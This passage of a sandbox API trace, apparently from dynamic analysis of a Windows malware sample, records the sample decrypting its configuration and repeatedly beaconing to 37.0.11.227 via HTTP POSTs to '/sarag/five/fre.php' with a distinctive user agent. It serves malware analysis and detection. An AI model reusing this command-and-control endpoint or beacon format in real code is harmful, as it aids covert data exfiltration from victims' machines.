ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0184.471] GetProcessHeap () returned 0x690000 [0184.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0184.471] GetProcessHeap () returned 0x690000 [0184.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0184.472] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.473] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.473] GetProcessHeap () returned 0x690000 [0184.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0184.473] GetProcessHeap () returned 0x690000 [0184.473] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.474] GetProcessHeap () returned 0x690000 [0184.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0184.474] GetProcessHeap () returned 0x690000 [0184.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0184.476] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.477] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.477] GetProcessHeap () returned 0x690000 [0184.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0184.477] GetProcessHeap () returned 0x690000 [0184.477] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.478] send (s=0x31c, buf=0x6abd08*, len=242, flags=0) returned 242 [0184.478] send (s=0x31c, buf=0x6aba40*, len=159, flags=0) returned 159 [0184.479] GetProcessHeap () returned 0x690000 [0184.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0184.479] recv (in: s=0x31c, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0184.561] GetProcessHeap () returned 0x690000 [0184.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0184.562] GetProcessHeap () returned 0x690000 [0184.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0184.562] GetProcessHeap () returned 0x690000 [0184.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0184.562] GetProcessHeap () returned 0x690000 [0184.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0184.564] closesocket (s=0x31c) returned 0 [0184.566] GetProcessHeap () returned 0x690000 [0184.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0184.566] GetProcessHeap () returned 0x690000 [0184.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0184.566] GetProcessHeap () returned 0x690000 [0184.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0184.567] GetProcessHeap () returned 0x690000 [0184.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0184.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5f0) returned 0x31c [0184.569] Sleep (dwMilliseconds=0xea60) [0184.571] GetProcessHeap () returned 0x690000 [0184.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0184.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.573] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.579] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0184.586] GetProcessHeap () returned 0x690000 [0184.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0184.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.588] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0184.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.589] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.590] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.590] GetProcessHeap () returned 0x690000 [0184.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0184.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.601] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0184.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.603] CryptDestroyKey (hKey=0x69d628) returned 1 [0184.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.604] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0184.604] GetProcessHeap () returned 0x690000 [0184.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0184.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.605] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.606] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.607] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.610] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.610] GetProcessHeap () returned 0x690000 [0184.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0184.610] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.610] GetProcessHeap () returned 0x690000 [0184.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0184.611] GetProcessHeap () returned 0x690000 [0184.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0184.611] GetProcessHeap () returned 0x690000 [0184.611] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0184.612] GetProcessHeap () returned 0x690000 [0184.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0184.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.613] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0184.627] GetProcessHeap () returned 0x690000 [0184.627] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0184.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.629] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0184.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.630] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.631] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.631] GetProcessHeap () returned 0x690000 [0184.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0184.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.633] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0184.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.635] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0184.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.636] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0184.636] GetProcessHeap () returned 0x690000 [0184.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0184.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.637] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0184.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.638] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0184.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.639] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0184.640] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.640] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0184.640] GetProcessHeap () returned 0x690000 [0184.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0184.641] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0184.641] GetProcessHeap () returned 0x690000 [0184.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0184.641] socket (af=2, type=1, protocol=6) returned 0x320 [0184.641] connect (s=0x320, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0184.663] FreeAddrInfoW (pAddrInfo=0x6a9b90*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0184.664] GetProcessHeap () returned 0x690000 [0184.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0184.664] GetProcessHeap () returned 0x690000 [0184.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0184.665] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.666] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.666] GetProcessHeap () returned 0x690000 [0184.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0184.666] GetProcessHeap () returned 0x690000 [0184.666] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.667] GetProcessHeap () returned 0x690000 [0184.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0184.667] GetProcessHeap () returned 0x690000 [0184.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0184.668] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.669] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.669] GetProcessHeap () returned 0x690000 [0184.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0184.669] GetProcessHeap () returned 0x690000 [0184.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.670] send (s=0x320, buf=0x6abd08*, len=242, flags=0) returned 242 [0184.670] send (s=0x320, buf=0x6aba40*, len=159, flags=0) returned 159 [0184.673] GetProcessHeap () returned 0x690000 [0184.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0184.673] recv (in: s=0x320, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0184.755] GetProcessHeap () returned 0x690000 [0184.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0184.756] GetProcessHeap () returned 0x690000 [0184.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0184.757] GetProcessHeap () returned 0x690000 [0184.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0184.757] GetProcessHeap () returned 0x690000 [0184.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0184.757] closesocket (s=0x320) returned 0 [0184.758] GetProcessHeap () returned 0x690000 [0184.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0184.758] GetProcessHeap () returned 0x690000 [0184.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0184.758] GetProcessHeap () returned 0x690000 [0184.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0184.759] GetProcessHeap () returned 0x690000 [0184.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0184.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xef0) returned 0x320 [0184.762] Sleep (dwMilliseconds=0xea60) [0184.764] GetProcessHeap () returned 0x690000 [0184.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0184.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.765] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.771] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0184.781] GetProcessHeap () returned 0x690000 [0184.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0184.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.782] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0184.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.786] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.787] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.787] GetProcessHeap () returned 0x690000 [0184.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0184.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.788] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0184.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.792] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0184.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.793] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0184.793] GetProcessHeap () returned 0x690000 [0184.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0184.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.796] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.800] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.802] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.803] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.803] GetProcessHeap () returned 0x690000 [0184.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0184.803] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.804] GetProcessHeap () returned 0x690000 [0184.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0184.804] GetProcessHeap () returned 0x690000 [0184.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0184.804] GetProcessHeap () returned 0x690000 [0184.805] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0184.805] GetProcessHeap () returned 0x690000 [0184.805] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0184.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.806] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.811] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0184.818] GetProcessHeap () returned 0x690000 [0184.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0184.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.819] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0184.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.820] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.822] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.822] GetProcessHeap () returned 0x690000 [0184.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0184.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.823] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0184.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.824] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0184.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.825] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0184.825] GetProcessHeap () returned 0x690000 [0184.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0184.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.826] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0184.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.829] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0184.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.830] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0184.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.831] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0184.831] GetProcessHeap () returned 0x690000 [0184.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0184.831] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9de8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0184.831] GetProcessHeap () returned 0x690000 [0184.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0184.831] socket (af=2, type=1, protocol=6) returned 0x324 [0184.832] connect (s=0x324, name=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0184.867] FreeAddrInfoW (pAddrInfo=0x6a9de8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0184.867] GetProcessHeap () returned 0x690000 [0184.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0184.867] GetProcessHeap () returned 0x690000 [0184.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0184.869] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.869] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.870] GetProcessHeap () returned 0x690000 [0184.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0184.870] GetProcessHeap () returned 0x690000 [0184.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.870] GetProcessHeap () returned 0x690000 [0184.870] 